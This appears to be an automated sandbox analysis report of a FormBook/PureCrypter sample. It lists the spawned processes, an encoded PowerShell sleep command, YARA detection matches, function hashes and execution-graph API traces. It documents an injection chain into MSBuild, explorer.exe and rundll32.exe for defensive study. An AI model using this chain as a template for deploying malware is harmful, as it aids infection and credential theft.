                                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.389628411.00000000033A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000003.303493629.0000000004637000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.389107599.00000000032B0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                              Reputation:low

                                                                                              General

                                                                                              Target ID:1
                                                                                              Start time:10:52:38
                                                                                              Start date:27/12/2022
                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
                                                                                              Imagebase:0xf00000
                                                                                              File size:430592 bytes
                                                                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:.Net C# or VB.NET
                                                                                              Reputation:high

                                                                                              General

                                                                                              Target ID:2
                                                                                              Start time:10:52:38
                                                                                              Start date:27/12/2022
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff7c72c0000
                                                                                              File size:625664 bytes
                                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high

                                                                                              General

                                                                                              Target ID:3
                                                                                              Start time:10:53:07
                                                                                              Start date:27/12/2022
                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe purecrypter.exe
                                                                                              Imagebase:0x530000
                                                                                              File size:261728 bytes
                                                                                              MD5 hash:D621FD77BD585874F9686D3A76462EF1
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.485479676.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.485479676.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.485479676.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.485989936.0000000000C10000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                              Reputation:high

                                                                                              General

                                                                                              Target ID:4
                                                                                              Start time:10:53:09
                                                                                              Start date:27/12/2022
                                                                                              Path:C:\Windows\explorer.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\Explorer.EXE
                                                                                              Imagebase:0x7ff618f60000
                                                                                              File size:3933184 bytes
                                                                                              MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000000.470848798.000000000C907000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.470848798.000000000C907000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000000.449196395.000000000C907000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.449196395.000000000C907000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                              Reputation:high

                                                                                              General

                                                                                              Target ID:7
                                                                                              Start time:10:53:50
                                                                                              Start date:27/12/2022
                                                                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Windows\SysWOW64\rundll32.exe
                                                                                              Imagebase:0x150000
                                                                                              File size:61952 bytes
                                                                                              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.830381361.00000000040C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.830381361.00000000040C0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.830381361.00000000040C0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.830264060.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.830264060.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.830264060.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.830332751.0000000004090000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.830332751.0000000004090000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.830332751.0000000004090000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                              Reputation:high

                                                                                              Disassembly

                                                                                              Reset < >

                                                                                                Execution Graph

                                                                                                Execution Coverage:6%
                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                Signature Coverage:0%
                                                                                                Total number of Nodes:4
                                                                                                Total number of Limit Nodes:0
                                                                                                execution_graph 4492 1810448 4493 1810456 4492->4493 4494 1810460 KiUserExceptionDispatcher 4493->4494 4495 1810470 4494->4495

                                                                                                Executed Functions

                                                                                                Function 018199D0 Relevance: 2.3, Strings: 1, Instructions: 1014COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 0 18199d0-18199f1 1 18199f3 0->1 2 18199f8-1819ae7 0->2 1->2 4 181a273-181a29b 2->4 5 1819aed-1819b05 2->5 8 181a9a1-181a9aa 4->8 11 1819b0f-1819c2e call 18146d0 5->11 9 181a9b0-181a9c7 8->9 10 181a2a9-181a2b3 8->10 12 181a2b5 10->12 13 181a2ba-181a3ae call 18146d0 10->13 51 1819c34-1819c8f 11->51 52 181a23c-181a266 11->52 12->13 33 181a3b0-181a3bc 13->33 34 181a3d8 13->34 36 181a3c6-181a3cc 33->36 37 181a3be-181a3c4 33->37 38 181a3de-181a3fe 34->38 39 181a3d6 36->39 37->39 42 181a400-181a459 38->42 43 181a45e-181a4de 38->43 39->38 55 181a99e 42->55 65 181a4e0-181a533 43->65 66 181a535-181a578 call 18146d0 43->66 58 1819c91 51->58 59 1819c94-1819c9f 51->59 62 181a270 52->62 63 181a268 52->63 55->8 58->59 64 181a151-181a157 59->64 62->4 63->62 67 1819ca4-1819cc2 64->67 68 181a15d-181a1d9 64->68 90 181a583-181a58c 65->90 66->90 71 1819cc4-1819cc8 67->71 72 1819d19-1819d2e 67->72 110 181a226-181a22c 68->110 71->72 77 1819cca-1819cd5 71->77 75 1819d30 72->75 76 1819d35-1819d4b 72->76 75->76 80 1819d52-1819d69 76->80 81 1819d4d 76->81 82 1819d0b-1819d11 77->82 86 1819d70-1819d86 80->86 87 1819d6b 80->87 81->80 83 1819d13-1819d14 82->83 84 1819cd7-1819cdb 82->84 89 1819d97-1819dd9 83->89 91 1819ce1-1819cf9 84->91 92 1819cdd 84->92 93 1819d88 86->93 94 1819d8d-1819d94 86->94 87->86 95 1819ddb-1819de7 89->95 96 1819ded-1819f58 89->96 98 181a5ec-181a5fb 90->98 99 1819d00-1819d08 91->99 100 1819cfb 91->100 92->91 93->94 94->89 95->96 103 1819f5a-1819f66 96->103 104 1819f6c-181a055 96->104 101 181a5fd-181a685 98->101 102 181a58e-181a5b6 98->102 99->82 100->99 140 181a7fe-181a80a 101->140 106 181a5b8 102->106 107 181a5bd-181a5e6 102->107 103->104 113 181a057-181a05b 104->113 114 181a0b9-181a0ce 104->114 106->107 107->98 111 181a1db-181a223 110->111 112 181a22e-181a234 110->112 111->110 112->52 113->114 119 181a05d-181a06c 113->119 116 181a0d0 114->116 117 181a0d5-181a0f6 114->117 116->117 121 181a0f8 117->121 122 181a0fd-181a11c 117->122 123 181a0ab-181a0b1 119->123 121->122 127 181a123-181a143 122->127 128 181a11e 122->128 125 181a0b3-181a0b4 123->125 126 181a06e-181a072 123->126 130 181a14e 125->130 131 181a074-181a078 126->131 132 181a07c-181a09d 126->132 133 181a145 127->133 134 181a14a 127->134 128->127 130->64 131->132 137 181a0a4-181a0a8 132->137 138 181a09f 132->138 133->134 134->130 137->123 138->137 141 181a810-181a86b 140->141 142 181a68a-181a693 140->142 157 181a8a2-181a8cc 141->157 158 181a86d-181a8a0 141->158 143 181a695 142->143 144 181a69c-181a7f2 142->144 143->144 146 181a771-181a7b1 143->146 147 181a6a2-181a6e2 143->147 148 181a6e7-181a727 143->148 149 181a72c-181a76c 143->149 161 181a7f8 144->161 146->161 147->161 148->161 149->161 166 181a8d5-181a968 157->166 158->166 161->140 170 181a96f-181a98f 166->170 170->55
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.387878679.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_1810000_SecuriteInfo.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: UUUU
                                                                                                • API String ID: 0-1798160573
                                                                                                • Opcode ID: 2fdd598d3cad67b37814bb2ece5774936dba2da438fecc047370674152527cd0
                                                                                                • Instruction ID: 033e7d6f677d4958302decb44df832d18deb16b1773f757dc8d39c37f1899074
                                                                                                • Opcode Fuzzy Hash: 2fdd598d3cad67b37814bb2ece5774936dba2da438fecc047370674152527cd0
                                                                                                • Instruction Fuzzy Hash: 73B2B275E00628CFDB65CF69C984A99BBB2FF89304F1581E9D509AB325DB319E81CF40
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0181043A Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 172 181043a-181044c 173 1810456-1810468 call 1810478 KiUserExceptionDispatcher 172->173 175 1810470-1810472 173->175
                                                                                                APIs
                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 01810462
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.387878679.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_1810000_SecuriteInfo.jbxd
                                                                                                Similarity
                                                                                                • API ID: DispatcherExceptionUser
                                                                                                • String ID:
                                                                                                • API String ID: 6842923-0
                                                                                                • Opcode ID: 79105c9cca9f881c8cebf8eedc7f9ad62fb29e407bac9b74087d5d67a9d9ccdd
                                                                                                • Instruction ID: 6e64f6aefb4d8f98419e1c41098fe05ee9dfce0815fb4f750070e5dbbdb29236
                                                                                                • Opcode Fuzzy Hash: 79105c9cca9f881c8cebf8eedc7f9ad62fb29e407bac9b74087d5d67a9d9ccdd
                                                                                                • Instruction Fuzzy Hash: 9DE08C31648B248FC756AB6C74282ED3BE2EF96532309049FD44AC7262DB690C498B82
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01810448 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 177 1810448-1810468 call 1810478 KiUserExceptionDispatcher 180 1810470-1810472 177->180
                                                                                                APIs
                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 01810462
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.387878679.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_1810000_SecuriteInfo.jbxd
                                                                                                Similarity
                                                                                                • API ID: DispatcherExceptionUser
                                                                                                • String ID:
                                                                                                • API String ID: 6842923-0
                                                                                                • Opcode ID: 3090a6886b87746016d2f09836b31d616a622de7a5c2b610f112bf9d4472eeb1
                                                                                                • Instruction ID: d13781a0b59edd71b003a874bcbd9726bfa274419880d7b000efe93f39a81929
                                                                                                • Opcode Fuzzy Hash: 3090a6886b87746016d2f09836b31d616a622de7a5c2b610f112bf9d4472eeb1
                                                                                                • Instruction Fuzzy Hash: 96D02232708134870A15376D702C06C37CAFBD883230C000AE407C7365CFA90C0003CA
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Non-executed Functions

                                                                                                Function 018142E8 Relevance: .2, Instructions: 171COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.387878679.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_1810000_SecuriteInfo.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 54fa5f52b9c8f2ba70204a8ef73c0bc09852e83cd213dd4dd3ec75cfc5fdd701
                                                                                                • Instruction ID: 7e8b622239333a8fbd7d7e6dc29f8821f47956cb9a6fc32a27853cdc9623b1fd
                                                                                                • Opcode Fuzzy Hash: 54fa5f52b9c8f2ba70204a8ef73c0bc09852e83cd213dd4dd3ec75cfc5fdd701
                                                                                                • Instruction Fuzzy Hash: 6F715DB0E402058FDB49DF6AE891699BBF6FFD8304F09C529C5089B37AEB3598058B51
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 018142F8 Relevance: .2, Instructions: 165COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.387878679.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_1810000_SecuriteInfo.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 910aef0e8cb92d473a68f4163f3a6b71ad71159e37daf9aaa711e06bbca558df
                                                                                                • Instruction ID: 4f1d60fc2ac38f92f163046df118ccf3f11664e04b0f34b2bfe71b806dbc50e5
                                                                                                • Opcode Fuzzy Hash: 910aef0e8cb92d473a68f4163f3a6b71ad71159e37daf9aaa711e06bbca558df
                                                                                                • Instruction Fuzzy Hash: 3C7170B0E402058FDB49DF6AE881699BBF6FFD8304F09C529C5089B37AEB3598058B51
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01814708 Relevance: .1, Instructions: 71COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.387878679.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_1810000_SecuriteInfo.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 5a32bea6f98dd9a9534b4e3a7f8368c9e512e746bf71b77052b755ba59d09453
                                                                                                • Instruction ID: a46a3467f43f45f2bbf5003b7b6b1f87f45f940f2853de482f3d63b3cabb826d
                                                                                                • Opcode Fuzzy Hash: 5a32bea6f98dd9a9534b4e3a7f8368c9e512e746bf71b77052b755ba59d09453
                                                                                                • Instruction Fuzzy Hash: 1C318AB1D016188BEB58CF6BDD4578EFAF7AFC9304F14C1A9D408AA264DB7406468F51
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01814718 Relevance: .1, Instructions: 68COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.387878679.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_1810000_SecuriteInfo.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: d995c00a6941ef11665c0078c1c93bc4c688648b38d4892256e914baccc2b1df
                                                                                                • Instruction ID: debd777103e1acea229d3b3b55ce184201fa23cd2140db524aab9bf244691415
                                                                                                • Opcode Fuzzy Hash: d995c00a6941ef11665c0078c1c93bc4c688648b38d4892256e914baccc2b1df
                                                                                                • Instruction Fuzzy Hash: FE31AAB1D016188BEB28CF6BD95578EFAF7BFC9304F14C1A9C40CAA258DB740A858F41
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Execution Graph

                                                                                                Execution Coverage:4.2%
                                                                                                Dynamic/Decrypted Code Coverage:2.5%
                                                                                                Signature Coverage:3.9%
                                                                                                Total number of Nodes:633
                                                                                                Total number of Limit Nodes:71
                                                                                                execution_graph 30180 401750 30181 40176b 30180->30181 30184 423263 30181->30184 30187 41fc03 30184->30187 30188 41fc29 30187->30188 30201 40bed3 30188->30201 30190 41fc35 30200 4017ef 30190->30200 30209 410103 30190->30209 30192 41fc54 30193 41fc67 30192->30193 30221 4100c3 30192->30221 30196 41fc7c 30193->30196 30230 41e883 30193->30230 30226 403553 30196->30226 30198 41fc8b 30199 41e883 2 API calls 30198->30199 30199->30200 30233 40be23 30201->30233 30203 40bee7 30203->30190 30204 40bee0 30204->30203 30245 40bdc3 30204->30245 30210 41012f 30209->30210 30659 40d413 30210->30659 30212 410141 30663 40ffd3 30212->30663 30215 41015c 30216 41e663 2 API calls 30215->30216 30218 410167 30215->30218 30216->30218 30217 410174 30219 41e663 2 API calls 30217->30219 30220 410185 30217->30220 30218->30192 30219->30220 30220->30192 30222 4195b3 LdrLoadDll 30221->30222 30223 4100e2 30222->30223 30224 4100e9 30223->30224 30225 4100eb GetUserGeoID 30223->30225 30224->30193 30225->30193 30227 403578 30226->30227 30229 4035b7 30227->30229 30682 40ddb3 30227->30682 30229->30198 30231 41f1a3 LdrLoadDll 30230->30231 30232 41e8a2 ExitProcess 30231->30232 30232->30196 30234 40be36 30233->30234 30284 41ce23 LdrLoadDll 30233->30284 30264 41cce3 30234->30264 30237 40be49 30237->30204 30238 40be3f 30238->30237 30267 41f553 30238->30267 30240 40be86 30240->30237 30278 40bc63 30240->30278 30242 40bea6 30285 40b6c3 LdrLoadDll 30242->30285 30244 40beb8 30244->30204 30246 40bddd 30245->30246 30247 41f843 LdrLoadDll 30245->30247 30634 41f843 30246->30634 30247->30246 30250 41f843 LdrLoadDll 30251 40be04 30250->30251 30252 40fec3 30251->30252 30253 40fedc 30252->30253 30642 40d293 30253->30642 30255 40feef 30646 41e3b3 30255->30646 30258 40bef8 30258->30190 30260 40ff15 30261 40ff40 30260->30261 30652 41e433 30260->30652 30262 41e663 2 API calls 30261->30262 30262->30258 30265 41ccf8 30264->30265 30286 41e7d3 LdrLoadDll 30264->30286 30265->30238 30268 41f56c 30267->30268 30287 4191a3 30268->30287 30270 41f584 30271 41f58d 30270->30271 30326 41f393 30270->30326 30271->30240 30273 41f5a1 30273->30271 30343 41e0d3 30273->30343 30612 409493 30278->30612 30280 40bc84 30280->30242 30281 40bc7d 30281->30280 30625 409753 30281->30625 30284->30234 30285->30244 30286->30265 30288 4194e6 30287->30288 30289 4191b7 30287->30289 30288->30270 30289->30288 30351 41de23 30289->30351 30292 4192e8 30354 41e533 30292->30354 30293 4192cb 30411 41e633 LdrLoadDll 30293->30411 30296 4192d5 30296->30270 30297 41930f 30298 420103 2 API calls 30297->30298 30299 41931b 30298->30299 30299->30296 30300 4194aa 30299->30300 30301 4194c0 30299->30301 30306 4193b3 30299->30306 30302 41e663 2 API calls 30300->30302 30420 418ec3 LdrLoadDll NtReadFile NtClose 30301->30420 30304 4194b1 30302->30304 30304->30270 30305 4194d3 30305->30270 30307 41941a 30306->30307 30309 4193c2 30306->30309 30307->30300 30308 41942d 30307->30308 30413 41e4b3 30308->30413 30311 4193c7 30309->30311 30312 4193db 30309->30312 30412 418d83 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 30311->30412 30314 4193e0 30312->30314 30315 4193f8 30312->30315 30357 418e23 30314->30357 30315->30304 30369 418b43 30315->30369 30317 4193d1 30317->30270 30320 41948d 30417 41e663 30320->30417 30321 4193ee 30321->30270 30324 419410 30324->30270 30325 419499 30325->30270 30327 41f3ae 30326->30327 30328 41f3c0 30327->30328 30448 420083 30327->30448 30328->30273 30330 41f3e0 30451 418793 30330->30451 30332 41f403 30332->30328 30333 418793 3 API calls 30332->30333 30334 41f425 30333->30334 30334->30328 30483 419b03 30334->30483 30336 41f4ad 30338 41f4bd 30336->30338 30578 41f123 LdrLoadDll 30336->30578 30494 41ef93 30338->30494 30340 41f4eb 30573 41e093 30340->30573 30344 41f1a3 LdrLoadDll 30343->30344 30345 41e0ef 30344->30345 30606 10e967a 30345->30606 30346 41e10a 30348 420103 30346->30348 30609 41e843 30348->30609 30350 41f5fc 30350->30240 30421 41f1a3 30351->30421 30353 41929c 30353->30292 30353->30293 30353->30296 30355 41f1a3 LdrLoadDll 30354->30355 30356 41e54f NtCreateFile 30355->30356 30356->30297 30358 418e3f 30357->30358 30359 41e4b3 LdrLoadDll 30358->30359 30360 418e60 30359->30360 30361 418e67 30360->30361 30362 418e7b 30360->30362 30363 41e663 2 API calls 30361->30363 30364 41e663 2 API calls 30362->30364 30365 418e70 30363->30365 30366 418e84 30364->30366 30365->30321 30431 420223 LdrLoadDll RtlAllocateHeap 30366->30431 30368 418e8f 30368->30321 30370 418bc1 30369->30370 30371 418b8e 30369->30371 30372 418d0c 30370->30372 30377 418bdd 30370->30377 30373 41e4b3 LdrLoadDll 30371->30373 30374 41e4b3 LdrLoadDll 30372->30374 30375 418ba9 30373->30375 30381 418d27 30374->30381 30376 41e663 2 API calls 30375->30376 30378 418bb2 30376->30378 30379 41e4b3 LdrLoadDll 30377->30379 30378->30324 30380 418bf8 30379->30380 30383 418c14 30380->30383 30384 418bff 30380->30384 30444 41e4f3 LdrLoadDll 30381->30444 30387 418c19 30383->30387 30388 418c2f 30383->30388 30386 41e663 2 API calls 30384->30386 30385 418d61 30389 41e663 2 API calls 30385->30389 30390 418c08 30386->30390 30391 41e663 2 API calls 30387->30391 30397 418c34 30388->30397 30432 4201e3 30388->30432 30393 418d6c 30389->30393 30390->30324 30394 418c22 30391->30394 30392 418c46 30392->30324 30393->30324 30394->30324 30397->30392 30435 41e5e3 30397->30435 30398 418c9a 30404 418cb1 30398->30404 30443 41e473 LdrLoadDll 30398->30443 30399 418cb8 30402 41e663 2 API calls 30399->30402 30400 418ccd 30403 41e663 2 API calls 30400->30403 30402->30392 30405 418cd6 30403->30405 30404->30399 30404->30400 30406 418d02 30405->30406 30438 41ff03 30405->30438 30406->30324 30408 418ced 30409 420103 2 API calls 30408->30409 30410 418cf6 30409->30410 30410->30324 30411->30296 30412->30317 30414 41f1a3 LdrLoadDll 30413->30414 30415 419475 30414->30415 30416 41e4f3 LdrLoadDll 30415->30416 30416->30320 30418 41f1a3 LdrLoadDll 30417->30418 30419 41e67f NtClose 30418->30419 30419->30325 30420->30305 30422 41f1b2 30421->30422 30424 41f228 30421->30424 30422->30424 30425 4195b3 30422->30425 30424->30353 30426 4195cd 30425->30426 30427 4195c1 30425->30427 30426->30424 30427->30426 30430 419a33 LdrLoadDll 30427->30430 30429 41971f 30429->30424 30430->30429 30431->30368 30445 41e803 30432->30445 30434 4201fb 30434->30397 30436 41f1a3 LdrLoadDll 30435->30436 30437 41e5ff NtReadFile 30436->30437 30437->30398 30439 41ff27 30438->30439 30440 41ff10 30438->30440 30439->30408 30440->30439 30441 4201e3 2 API calls 30440->30441 30442 41ff3e 30441->30442 30442->30408 30443->30404 30444->30385 30446 41f1a3 LdrLoadDll 30445->30446 30447 41e81f RtlAllocateHeap 30446->30447 30447->30434 30579 41e713 30448->30579 30450 4200b0 30450->30330 30452 4187a4 30451->30452 30453 4187ac 30451->30453 30452->30332 30482 418a7f 30453->30482 30582 421273 30453->30582 30455 418800 30456 421273 2 API calls 30455->30456 30459 41880b 30456->30459 30457 418859 30460 421273 2 API calls 30457->30460 30459->30457 30461 4213a3 3 API calls 30459->30461 30593 421313 LdrLoadDll RtlAllocateHeap RtlFreeHeap 30459->30593 30463 41886d 30460->30463 30461->30459 30462 4188ca 30464 421273 2 API calls 30462->30464 30463->30462 30587 4213a3 30463->30587 30466 4188e0 30464->30466 30467 41891d 30466->30467 30469 4213a3 3 API calls 30466->30469 30468 421273 2 API calls 30467->30468 30471 418928 30468->30471 30469->30466 30470 4213a3 3 API calls 30470->30471 30471->30470 30477 418962 30471->30477 30473 418a57 30595 4212d3 LdrLoadDll RtlFreeHeap 30473->30595 30475 418a61 30596 4212d3 LdrLoadDll RtlFreeHeap 30475->30596 30594 4212d3 LdrLoadDll RtlFreeHeap 30477->30594 30478 418a6b 30597 4212d3 LdrLoadDll RtlFreeHeap 30478->30597 30480 418a75 30598 4212d3 LdrLoadDll RtlFreeHeap 30480->30598 30482->30332 30484 419b14 30483->30484 30485 4191a3 8 API calls 30484->30485 30487 419b2a 30485->30487 30486 419b33 30486->30336 30487->30486 30488 419b6a 30487->30488 30491 419bb6 30487->30491 30489 420103 2 API calls 30488->30489 30490 419b7b 30489->30490 30490->30336 30492 420103 2 API calls 30491->30492 30493 419bbb 30492->30493 30493->30336 30599 41ee23 30494->30599 30496 41efa7 30497 41ee23 LdrLoadDll 30496->30497 30498 41efb0 30497->30498 30499 41ee23 LdrLoadDll 30498->30499 30500 41efb9 30499->30500 30501 41ee23 LdrLoadDll 30500->30501 30502 41efc2 30501->30502 30503 41ee23 LdrLoadDll 30502->30503 30504 41efcb 30503->30504 30505 41ee23 LdrLoadDll 30504->30505 30506 41efd4 30505->30506 30507 41ee23 LdrLoadDll 30506->30507 30508 41efe0 30507->30508 30509 41ee23 LdrLoadDll 30508->30509 30510 41efe9 30509->30510 30511 41ee23 LdrLoadDll 30510->30511 30512 41eff2 30511->30512 30513 41ee23 LdrLoadDll 30512->30513 30514 41effb 30513->30514 30515 41ee23 LdrLoadDll 30514->30515 30516 41f004 30515->30516 30517 41ee23 LdrLoadDll 30516->30517 30518 41f00d 30517->30518 30519 41ee23 LdrLoadDll 30518->30519 30520 41f019 30519->30520 30521 41ee23 LdrLoadDll 30520->30521 30522 41f022 30521->30522 30523 41ee23 LdrLoadDll 30522->30523 30524 41f02b 30523->30524 30525 41ee23 LdrLoadDll 30524->30525 30526 41f034 30525->30526 30527 41ee23 LdrLoadDll 30526->30527 30528 41f03d 30527->30528 30529 41ee23 LdrLoadDll 30528->30529 30530 41f046 30529->30530 30531 41ee23 LdrLoadDll 30530->30531 30532 41f052 30531->30532 30533 41ee23 LdrLoadDll 30532->30533 30534 41f05b 30533->30534 30535 41ee23 LdrLoadDll 30534->30535 30536 41f064 30535->30536 30537 41ee23 LdrLoadDll 30536->30537 30538 41f06d 30537->30538 30539 41ee23 LdrLoadDll 30538->30539 30540 41f076 30539->30540 30541 41ee23 LdrLoadDll 30540->30541 30542 41f07f 30541->30542 30543 41ee23 LdrLoadDll 30542->30543 30544 41f08b 30543->30544 30545 41ee23 LdrLoadDll 30544->30545 30546 41f094 30545->30546 30547 41ee23 LdrLoadDll 30546->30547 30548 41f09d 30547->30548 30549 41ee23 LdrLoadDll 30548->30549 30550 41f0a6 30549->30550 30551 41ee23 LdrLoadDll 30550->30551 30552 41f0af 